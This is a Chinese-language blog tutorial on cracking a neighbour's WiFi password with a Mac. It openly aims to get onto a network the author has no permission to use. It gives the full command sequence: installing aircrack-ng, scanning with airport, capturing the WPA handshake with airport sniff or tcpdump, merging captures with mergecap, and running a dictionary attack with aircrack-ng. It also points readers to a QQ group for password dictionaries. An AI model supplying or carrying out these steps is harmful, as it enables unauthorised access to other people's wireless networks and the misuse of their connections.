Mac破解WiFi密码

​ 在上海租了个房子,每个月需要交20元网费,估计是路由器的原因,我那个房间几乎连接不上WiFi。可是搜索WiFi时发现隔壁老王家的WIFI信号那叫一个强呀,作为码农的我,于是乎,打开了我的MacPro。。。。。。

先给大家看看结果吧😃

image-20191230162317544

接下来,保姆式教程步骤。

  1. 安装aircrack-ng。

    1. Mac上安装过Homebrew的同学们可以直接使用如下命令:

      1
      brew install aircrack-ng (function用的就是这个)
    2. Mac上安装过XCode得同学们可以先安装macport ,然后使用如下命令:

      1
      2
      3
      4
      5
      通过终端命令行执行:
      sudo port install aircrack-ng
      要求输入密码,输入后可能会提示 Port aircrack-ng not found ,没关系我们需要更新 ports tree,在终端执行:
      sudo port -v selfupdate
      如果还提示 not found,那么再次执行更新 ports tree 命令。
  2. 通过ifconfig命令获取当前的网卡的名字, 我这边网卡名字为en0。

  3. 添加airport快链。

    1
    ln -s /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport /usr/local/bin/airport
  4. 查看附近的WiFi列表。

    1. 执行如下命令获取列表:

      1
      airport -s
    2. 命令返回结果解释如下图:

      image-20191230163938106

  5. 监听频道获取到握手的包。

    1
    sudo airport en0 sniff 6 (en0就是我的网卡名,6就是第四步里图示的名称为"华为P30"的CHANNEL)
    1. 当执行以上命令, 开始监听以后, wifi的图标会发生改变,已连接的WiFi网络会自动断掉:

    2. 监听久一点,然后使用 ctrl+c 停止监听,系统会把监听到的数据保存到本地,如下图,数据保存到 /tmp/*.cap 文件中。(注:如果没有下面5.3的报错问题,则可直接跳到步骤7)

    3. 如果出现如下问题:(版本问题:macos mojave airport sniff 报错)请使用步骤6中的tcpdump抓包:

      image-20191230164629600

  6. 使用tcpdump进行抓包。

    1. sudo airport -z

    2. sudo airport -c6(6就是第四步里图示的名称为”华为P30”的CHANNEL)

    3. sudo tcpdump “type mgt subtype beacon and ether src 24:31:54:e3:cc:10(WiFi名为:华为P30的BSSID)” -I -c 1 -i en0(电脑的网卡) -w beacon.cap

      1
      2
      3
      4
      返回结果参考:tcpdump: listening on en0, link-type IEEE802_11_RADIO (802.11 plus radiotap header), capture size 262144 bytes
      1 packet captured
      378 packets received by filter
      0 packets dropped by kernel
    4. sudo tcpdump “ether proto 0x888e and ether host 24:31:54:e3:cc:10” -I -U -vvv -i en0 -w cap.cap

      1
      返回结果参考:Got为0表示等待Wi-Fi被连接,Got为4表示有别人连接这个wifi了,此时成功抓取握手包
    5. 安装wireshark:

      1
      brew install wireshark
    6. 合并上面4和5的beacon.cap和cap.cap文件为handshake.cap

      1
      mergecap -a -F pcap -w handshake.cap beacon.cap cap.cap
  7. 破解密码。

    1. 在当前目录保存一个密码字典比如我的为:pwd.txt(数据字典可以加我QQ获取:1074952839由于加我的好友较多,本人无法及时回复,所以讲数据字典放到群文件,有需要的请直接加群获取。群号为:598550948)

    2. 如果同学您步骤5中没有报错的话,你可以执行下面命令:

      1
      sudo aircrack-ng -w pwd.txt /tmp/*.cap
    3. 如果同学您步骤5中有错,并且做完了步骤6中的话,你可以执行下面的命令:

      1
      sudo aircrack-ng -w dic.txt handshake.cap
  8. 总结。

    只要字典够大,密码破出来应该指日可待。

    破解成功以后,命令行会显示 KEY FOUND。

    image-20191230162317544

Xie Kun wechat
觉得不错,请喝奶茶吧😃